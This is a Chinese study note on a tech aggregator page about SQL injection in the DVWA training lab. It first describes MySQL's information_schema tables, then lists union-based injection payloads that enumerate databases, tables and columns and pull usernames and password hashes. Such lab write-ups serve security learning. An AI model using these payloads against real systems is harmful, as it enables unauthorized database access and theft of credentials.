IT数码 购物 网址 头条 软件 日历 阅读 图书馆
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
图片批量下载器
↓批量下载图片,美女图库↓
图片自动播放器
↓图片自动播放器↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁
 
   -> 大数据 -> DVWA SQL Injection -> 正文阅读

[大数据]DVWA SQL Injection

记录SQL注入相关,供自己查看,MySQL5.0及以上版本提供了information_schema信息数据库,提供了访问数据库元数据的方式。

information_schema数据库表说明:

SCHEMATA表:提供了当前mysql实例中所有数据库的信息。是show databases的结果取之此表。

TABLES表:提供了关于数据库中的表的信息(包括视图)。详细表述了某个表属于哪个schema,表类型,表引擎,创建时间等信息。是show tables from schemaname的结果取之此表。

TABLES表字段:

Table_catalog数据表登记目录
Table_schema数据表所属的数据库名
Table_name表名称
Table_type表类型[system view|base table]
Engine使用的数据库引擎[MyISAM|CSV|InnoDB]
Version版本,默认值10
Row_format行格式[Compact|Dynamic|Fixed]
Table_rows表里所存多少行数据
Avg_row_length平均行长度
Data_length数据长度
Max_data_length最大数据长度
Index_length索引长度
Data_free空间碎片
Auto_increment做自增主键的自动增量当前值
Create_time表的创建时间
Update_time表的更新时间
Check_time表的检查时间
Table_collation表的字符校验编码集
Checksum校验和
Create_options创建选项
Table_comment表的注释、备注

COLUMNS表:提供了表中的列信息。详细表述了某张表的所有列以及每个列的信息。是show columns from schemaname.tablename的结果取之此表。

COLUMNS表字段:

TABLE_CATALOGnvarchar(128)表限定符
TABLE_SCHEMAnvarchar(128)数据库名
TABLE_NAMEnvarchar(128)表名
COLUMN_NAMEnvarchar(128)列名
ORDINAL_POSITIONsmallint列标识号
COLUMN_DEFAULTnvarchar(4000)列的默认值
IS_NULLABLEvarchar(3)列的为空性。如果列允许 NULL,那么该列返回 YES。否则,返回 NO
DATA_TYPEnvarchar(128)系统提供的数据类型
CHARACTER_MAXIMUM_LENGTHsmallint以字符为单位的最大长度,适于二进制数据、字符数据,或者文本和图像数据。否则,返回 NULL。有关更多信息,请参见数据类型
CHARACTER_OCTET_LENGTHsmallint以字节为单位的最大长度,适于二进制数据、字符数据,或者文本和图像数据。否则,返回 NULL
NUMERIC_PRECISIONtinyint近似数字数据、精确数字数据、整型数据或货币数据的精度。否则,返回 NULL
NUMERIC_PRECISION_RADIXsmallint近似数字数据、精确数字数据、整型数据或货币数据的精度基数。否则,返回 NULL
NUMERIC_SCALEtinyint近似数字数据、精确数字数据、整数数据或货币数据的小数位数。否则,返回 NULL
DATETIME_PRECISIONsmallintdatetime?及 SQL-92?interval?数据类型的子类型代码。对于其它数据类型,返回 NULL
CHARACTER_SET_CATALOGvarchar(6)如果列是字符数据或?text?数据类型,那么返回?master,指明字符集所在的数据库。否则,返回 NULL
CHARACTER_SET_SCHEMAvarchar(3)如果列是字符数据或?text?数据类型,那么返回?DBO,指明字符集的所有者名称。否则,返回 NULL
CHARACTER_SET_NAMEnvarchar(128)如果该列是字符数据或?text?数据类型,那么为字符集返回唯一的名称。否则,返回 NULL
COLLATION_CATALOGvarchar(6)如果列是字符数据或?text?数据类型,那么返回?master,指明在其中定义排序次序的数据库。否则此列为 NULL
COLLATION_SCHEMAvarchar(3)返回?DBO,为字符数据或?text?数据类型指明排序次序的所有者。否则,返回 NULL
COLLATION_NAMEnvarchar(128)如果列是字符数据或?text?数据类型,那么为排序次序返回唯一的名称。否则,返回 NULL
DOMAIN_CATALOGnvarchar(128)如果列是一种用户定义数据类型,那么该列是某个数据库名称,在该数据库名中创建了这种用户定义数据类型。否则,返回 NULL
DOMAIN_SCHEMAnvarchar(128)如果列是一种用户定义数据类型,那么该列是这种用户定义数据类型的创建者。否则,返回 NULL
DOMAIN_NAMEnvarchar(128)

如果列是一种用户定义数据类型,那么该列是这种用户定义数据类型的名称。否则,返回 NULL

STATISTICS表:提供了关于表索引的信息。是show index from schemaname.tablename的结果取之此表。

USER_PRIVILEGES(用户权限)表:给出了关于全程权限的信息。该信息源自mysql.user授权表。是非标准表。

SCHEMA_PRIVILEGES(方案权限)表:给出了关于方案(数据库)权限的信息。该信息来自mysql.db授权表。是非标准表。

TABLE_PRIVILEGES(表权限)表:给出了关于表权限的信息。该信息源自mysql.tables_priv授权表。是非标准表。

COLUMN_PRIVILEGES(列权限)表:给出了关于列权限的信息。该信息源自mysql.columns_priv授权表。是非标准表。

CHARACTER_SETS(字符集)表:提供了mysql实例可用字符集的信息。是SHOW CHARACTER SET结果集取之此表。


COLLATIONS表:提供了关于各字符集的对照信息。

COLLATION_CHARACTER_SET_APPLICABILITY表:指明了可用于校对的字符集。这些列等效于SHOW COLLATION的前两个显示字段。

TABLE_CONSTRAINTS表:描述了存在约束的表。以及表的约束类型。

KEY_COLUMN_USAGE表:描述了具有约束的键列。

ROUTINES表:提供了关于存储子程序(存储程序和函数)的信息。此时,ROUTINES表不包含自定义函数(UDF)。名为“mysql.proc name”的列指明了对应于INFORMATION_SCHEMA.ROUTINES表的mysql.proc表列。

VIEWS表:给出了关于数据库中的视图的信息。需要有show views权限,否则无法查看视图信息。

TRIGGERS表:提供了关于触发程序的信息。必须有super权限才能查看该表

若拥有数据库所有权限,通过以上两个表可以查询到数据库的所有数据库、数据表以及数据表字段信息。

检查是否存在SQL注入:

' or 1=1#

?单引号闭合的情况,或者换成双引号尝试

?尝试使用union查询,首先测试查询的字段数

' union select 1#

' union select 1,2#

得知查询字段为两个

获取数据库版本信息,用户,数据库

' union select version(),concat(user(),' ',database())#

已获取当前数据库,获取数据库中所有的数据表:

' union select table_name,NULL from information_schema.tables where table_schema = 'dvwa'#

已获得数据表,获取某个数据表中所有字段:

' union select column_name,1 from information_schema.columns where table_schema = 'dvwa' and table_name = 'users'#

?根据数据表的字段查询数据库内容:

' union select user,concat(password,'|',last_login) from users#

?获取其它的信息:

查询所有数据库以及对应的数据表:

' union select table_schema,group_concat(table_name) from information_schema.tables group by table_schema#

?查询所有数据表以及对应的字段:

' union select table_name,group_concat(column_name) from information_schema.columns group by table_name#

?

?

  大数据 最新文章
实现Kafka至少消费一次
亚马逊云科技:还在苦于ETL?Zero ETL的时代
初探MapReduce
【SpringBoot框架篇】32.基于注解+redis实现
Elasticsearch:如何减少 Elasticsearch 集
Go redis操作
Redis面试题
专题五 Redis高并发场景
基于GBase8s和Calcite的多数据源查询
Redis——底层数据结构原理
上一篇文章      下一篇文章      查看所有文章
加:2021-09-08 10:48:29  更:2021-09-08 10:50:05 
 
开发: C++知识库 Java知识库 JavaScript Python PHP知识库 人工智能 区块链 大数据 移动开发 嵌入式 开发工具 数据结构与算法 开发测试 游戏开发 网络协议 系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑 笔记本 显卡 显示器 固态硬盘 硬盘 耳机 手机 iphone vivo oppo 小米 华为 单反 装机 图拉丁

360图书馆 购物 三丰科技 阅读网 日历 万年历 2024年11日历 -2024/11/23 20:09:24-

图片自动播放器
↓图片自动播放器↓
TxT小说阅读器
↓语音阅读,小说下载,古典文学↓
一键清除垃圾
↓轻轻一点,清除系统垃圾↓
图片批量下载器
↓批量下载图片,美女图库↓
  网站联系: qq:121756557 email:121756557@qq.com  IT数码